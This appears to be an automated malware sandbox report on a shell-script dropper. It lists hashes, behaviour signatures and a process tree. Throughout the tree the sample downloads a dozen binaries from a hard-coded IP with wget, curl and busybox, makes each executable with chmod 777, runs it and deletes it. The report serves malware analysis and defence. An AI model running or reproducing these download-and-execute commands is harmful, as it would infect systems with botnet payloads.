Analysis
max time kernel: 34s
max time network: 51s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 01:59
Static task: static1
Behavioral task behavioral1: sample 7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh, resource ubuntu1804-amd64-20240508-en
Behavioral task behavioral2: sample 7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample 7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh, resource debian9-mipsbe-20240729-en
Behavioral task behavioral4: sample 7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh, resource debian9-mipsel-20240611-en
General
Target: 7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Size: 10KB
MD5: d08f4f01c6ec9c67ead46ab98f031a55
SHA1: cac804b670bc7011aff98353a06d5906917e496a
SHA256: 7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514
SHA512: be5c70e0361500fe82048f5f3cc74bd6019fa75dc8edd3d43bdc5cf875e01e8b9a0f7922e67c42ea1a96e8821f8997c3b73c2f019b571a3ca202dc155e6bbbc7
SSDEEP: 192:JKto885QciICt1xQYUHgw6AtXj89F6UnrPCJpBrPCJpM21xBA885QcozXj89FWY3:JKG885QciICt1xOUnrPCJpBrPCJpM21M
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 12 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
767  chmod
817  chmod
832  chmod
683  chmod
735  chmod
721  chmod
748  chmod
777  chmod
786  chmod
801  chmod
694  chmod
700  chmod

Executes dropped EXE (12 IoCs)
ioc  pid  Process
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  684  0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  695  EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  701  4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  723  fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  736  1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  750  6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  769  AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  778  djVle6T71YXXfjsEnSm4CZ6stk0wE9n003
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  787  G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  802  Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  818  ukydHV98yzuiaTZfLkSAjstPpW905BtH3z
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  833  wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h
Checks CPU configuration (1 TTPs, 12 IoCs)
Checks CPU information, which can indicate whether the system is a virtual machine.
description  ioc  Process
File opened for reading  /proc/cpuinfo  curl  (12 occurrences, one per curl download)

Reads runtime system information (24 IoCs)
description  ioc  Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl  (12 occurrences)
File opened for reading  /proc/self/auxv  curl  (12 occurrences)
Writes file to tmp directory (12 IoCs)
Malware often drops required files in the /tmp directory.
description  ioc  Process
File opened for modification  /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  curl
File opened for modification  /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  curl
File opened for modification  /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  curl
File opened for modification  /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  curl
File opened for modification  /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  curl
File opened for modification  /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  curl
File opened for modification  /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  curl
File opened for modification  /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  curl
File opened for modification  /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  curl
File opened for modification  /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  curl
File opened for modification  /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  curl
File opened for modification  /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  curl
Processes
Process  Command line  (PID); child processes are indented under the parent, triggered signatures are listed beneath each process.

/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh  /tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh  (PID 656)
  /bin/rm  /bin/rm bins.sh  (PID 662)
  /usr/bin/wget  wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  (PID 664)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  (PID 671)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  (PID 680)
  /bin/chmod  chmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  (PID 683)
    - File and Directory Permissions Modification
  /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  ./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  (PID 684)
    - Executes dropped EXE
  /bin/rm  rm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c  (PID 686)
  /usr/bin/wget  wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  (PID 688)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  (PID 691)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  (PID 693)
  /bin/chmod  chmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  (PID 694)
    - File and Directory Permissions Modification
  /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  ./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  (PID 695)
    - Executes dropped EXE
  /bin/rm  rm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8  (PID 696)
  /usr/bin/wget  wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  (PID 697)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  (PID 698)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  (PID 699)
  /bin/chmod  chmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  (PID 700)
    - File and Directory Permissions Modification
  /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  ./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  (PID 701)
    - Executes dropped EXE
  /bin/rm  rm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA  (PID 702)
  /usr/bin/wget  wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  (PID 704)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  (PID 708)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  (PID 718)
  /bin/chmod  chmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  (PID 721)
    - File and Directory Permissions Modification
  /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  ./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  (PID 723)
    - Executes dropped EXE
  /bin/rm  rm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL  (PID 724)
  /usr/bin/wget  wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  (PID 725)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  (PID 728)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  (PID 732)
  /bin/chmod  chmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  (PID 735)
    - File and Directory Permissions Modification
  /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  ./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  (PID 736)
    - Executes dropped EXE
  /bin/rm  rm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD  (PID 737)
  /usr/bin/wget  wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  (PID 739)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  (PID 742)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  (PID 746)
  /bin/chmod  chmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  (PID 748)
    - File and Directory Permissions Modification
  /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  ./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  (PID 750)
    - Executes dropped EXE
  /bin/rm  rm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj  (PID 751)
  /usr/bin/wget  wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  (PID 752)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  (PID 758)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  (PID 765)
  /bin/chmod  chmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  (PID 767)
    - File and Directory Permissions Modification
  /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  ./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  (PID 769)
    - Executes dropped EXE
  /bin/rm  rm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs  (PID 770)
  /usr/bin/wget  wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  (PID 771)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  (PID 774)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  (PID 776)
  /bin/chmod  chmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  (PID 777)
    - File and Directory Permissions Modification
  /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  ./djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  (PID 778)
    - Executes dropped EXE
  /bin/rm  rm djVle6T71YXXfjsEnSm4CZ6stk0wE9n003  (PID 779)
  /usr/bin/wget  wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  (PID 780)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  (PID 781)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  (PID 784)
  /bin/chmod  chmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  (PID 786)
    - File and Directory Permissions Modification
  /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  ./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  (PID 787)
    - Executes dropped EXE
  /bin/rm  rm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp  (PID 788)
  /usr/bin/wget  wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  (PID 790)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  (PID 793)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  (PID 798)
  /bin/chmod  chmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  (PID 801)
    - File and Directory Permissions Modification
  /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  ./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  (PID 802)
    - Executes dropped EXE
  /bin/rm  rm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN  (PID 803)
  /usr/bin/wget  wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  (PID 804)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  (PID 811)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  (PID 814)
  /bin/chmod  chmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  (PID 817)
    - File and Directory Permissions Modification
  /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  ./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  (PID 818)
    - Executes dropped EXE
  /bin/rm  rm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z  (PID 820)
  /usr/bin/wget  wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  (PID 821)
  /usr/bin/curl  curl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  (PID 824)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  (PID 829)
  /bin/chmod  chmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  (PID 832)
    - File and Directory Permissions Modification
  /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  ./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  (PID 833)
    - Executes dropped EXE
  /bin/rm  rm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h  (PID 834)
  /usr/bin/wget  wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a  (PID 836)
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97